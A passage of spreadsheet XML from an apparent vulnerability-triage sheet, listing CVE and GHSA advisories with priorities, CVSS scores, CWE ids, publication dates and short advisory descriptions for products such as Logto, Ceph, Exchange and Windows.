          <t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82262</t>
        </is>
      </c>
      <c r="D631" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F631" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr"/>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr"/>
      <c r="Q631" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R631" s="5" t="inlineStr">
        <is>
          <t>Logto through 1.42.0 contains a server-side request forgery vulnerability in the POST /api/hooks/:id/test endpoint that accepts arbitrary URLs without host validation. Tenant administrators with Management API tokens can make the server issue HTTP POST requests to internal URLs and retrieve response bodies from services on the private network.</t>
        </is>
      </c>
      <c r="S631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82262</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82263</t>
        </is>
      </c>
      <c r="D632" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F632" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr"/>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr"/>
      <c r="Q632" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R632" s="5" t="inlineStr">
        <is>
          <t>Logto through 1.42.0 contains a server-side request forgery vulnerability in the OIDC SSO connector creation endpoint that fails to validate the issuer URL parameter. Tenant administrators with Management API credentials can supply arbitrary internal URLs to trigger HTTP GET requests to private network services, with response content returned in API responses.</t>
        </is>
      </c>
      <c r="S632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82263</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82728</t>
        </is>
      </c>
      <c r="D633" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F633" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr"/>
      <c r="L633" s="5" t="inlineStr"/>
      <c r="M633" s="5" t="inlineStr"/>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr"/>
      <c r="Q633" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R633" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint mint allows a remote HTTP server to exhaust memory on the client host and cause a denial of service.
Two HTTP/1 response-parser states accumulate server data without any cap. In lib/mint/http1.ex, decode_status_line/4 stores the unconsumed data in conn.buffer when the status line is incomplete, and decode_body/5 does the same for an unterminated chunk-extension line. Both wait for a CRLF the server never has to send, and conn.buffer is prepended to every subsequent socket message. The :max_header_list_size budget is wired only into decode_headers/5 and decode_trailer_headers/4, so neither of these states is covered by it. A malicious server, or one reached through an attacker-controlled redirect or a fetched URL, streams bytes indefinitely until the BEAM node is killed by the operating system out-of-memory handler. The chunk-extension variant is reached after a valid status line and a complete, valid header section, so an intermediary inspecting only headers sees an ordinary 200 response.
This issue affects mint: from 0.1.0 before 1.10.0.</t>
        </is>
      </c>
      <c r="S633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82728</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83939</t>
        </is>
      </c>
      <c r="D634" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F634" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr"/>
      <c r="Q634" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R634" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86600</t>
        </is>
      </c>
      <c r="D635" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F635" s="5" t="inlineStr">
        <is>
          <t>412d305a-227d-44f9-a262-a31ba44f2aea</t>
        </is>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr"/>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr"/>
      <c r="Q635" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-522</t>
        </is>
      </c>
      <c r="R635"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S635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>GHSA-qp76-pq9f-gr9m</t>
        </is>
      </c>
      <c r="D636" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F636" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="inlineStr"/>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr"/>
      <c r="P636" s="5" t="inlineStr"/>
      <c r="Q636" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R636" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-568f-pv23-39p4. This link is maintained to preserve external references.
## Original Description
NLTK versions before 3.10.0 contain a path traversal vulnerability in FramenetCorpusReader and NKJPCorpusReader that allows attackers to parse XML files outside the corpus root by supplying unsafe selectors or poisoned index state. Attackers can exploit frame_by_name, doc, lu, and header methods with crafted parameters to read arbitrary XML files accessible to the application.</t>
        </is>
      </c>
      <c r="S636" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-qp76-pq9f-gr9m</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19219</t>
        </is>
      </c>
      <c r="D637" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F637" s="5" t="inlineStr">
        <is>
          <t>security@progress.com</t>
        </is>
      </c>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr"/>
      <c r="Q637" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-434</t>
        </is>
      </c>
      <c r="R637" s="5" t="inlineStr">
        <is>
          <t>In Progress® Telerik® UI for AJAX prior to v2026.3.812, insufficient integrity protection of dialog request parameters used by the RadEditor file browser may allow an attacker who has obtained certain application encryption key material to alter the folders the file browser reads from, writes to, and uploads into, potentially resulting in remote code execution.</t>
        </is>
      </c>
      <c r="S637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19219</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47297</t>
        </is>
      </c>
      <c r="D638" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F638" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr"/>
      <c r="Q638" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R638" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47297</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54330</t>
        </is>
      </c>
      <c r="D639" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F639" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr"/>
      <c r="Q639" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R639" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the Ceph Object Gateway (RGW) SigV4 handler does not reject requests that carry x-amz-* headers absent from the signed header set, allowing anyone holding a presigned URL to attach arbitrary unsigned x-amz-* headers that RGW will honor. AWS S3 requires every x-amz-* header on a SigV4 request to be signed and rejects requests bearing additional unsigned headers, but RGW validates only the headers listed in X-Amz-SignedHeaders and ignores any extra ones, so they take effect without being covered by the signature. By adding such headers to a presigned PUT URL, an attacker can grant themselves more capabilities than the URL's signer intended and escalate their privileges. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="S639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54330</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55007</t>
        </is>
      </c>
      <c r="D640" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F640" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr"/>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr"/>
      <c r="Q640" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R640" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61641</t>
        </is>
      </c>
      <c r="D641" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F641" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr"/>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr"/>
      <c r="Q641" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R641" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. From version 4.0.0 to before version 4.9.6, Wallos's OIDC login links an incoming OIDC identity to an existing local account by matching the email claim alone, without verifying that the IdP marked that email as verified (email_verified). When Wallos is configured against an IdP that lets a user present an arbitrary or unverified email (multi-tenant IdPs, IdPs with open self-registration, or any IdP the attacker partly controls), an attacker with no Wallos account can authenticate with the admin's email and be logged in as the admin — full account takeover, no password needed. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="S641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61641</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61699</t>
        </is>
      </c>
      <c r="D642" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F642" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr"/>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr"/>
      <c r="Q642" s="5" t="inlineStr">
        <is>
          <t>CWE-299, CWE-672</t>
        </is>
      </c>
      <c r="R642" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.7.1, revocation is the only in-band mechanism that isolates a compromised/offboarded host from a Nebula mesh. Because the blocklist never reaches any peer's config.yml, a Blocked host retains full overlay reachability to every peer under its CA (and internal services on the mesh) for up to 30d (agent) / 365d (mobile). An attacker who exfiltrates host.key+host.crt can run stock slackhq/nebula directly, ignore the agent's 403/410 poll responses, and stay connected after the operator revokes the host. Operator-visible state (UI shows blocked, audit log records it) is misleading. This issue has been patched in version 0.7.1.</t>
        </is>
      </c>
      <c r="S642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61699</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69325</t>
        </is>
      </c>
      <c r="D643" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F643" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr"/>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr"/>
      <c r="Q643" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R643" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69380</t>
        </is>
      </c>
      <c r="D644" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F644" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr"/>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr"/>
      <c r="Q644" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R644" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69438</t>
        </is>
      </c>
      <c r="D645" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E645" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F645" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr"/>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr"/>
      <c r="Q645" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="R645" s="5" t="inlineStr">
        <is>
          <t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69510</t>
        </is>
      </c>
      <c r="D646" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E646" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F646" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K646" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr"/>
      <c r="Q646" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R646" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69524</t>
        </is>
      </c>
      <c r="D647" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F647" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr"/>
      <c r="L647" s="5" t="inlineStr"/>
      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
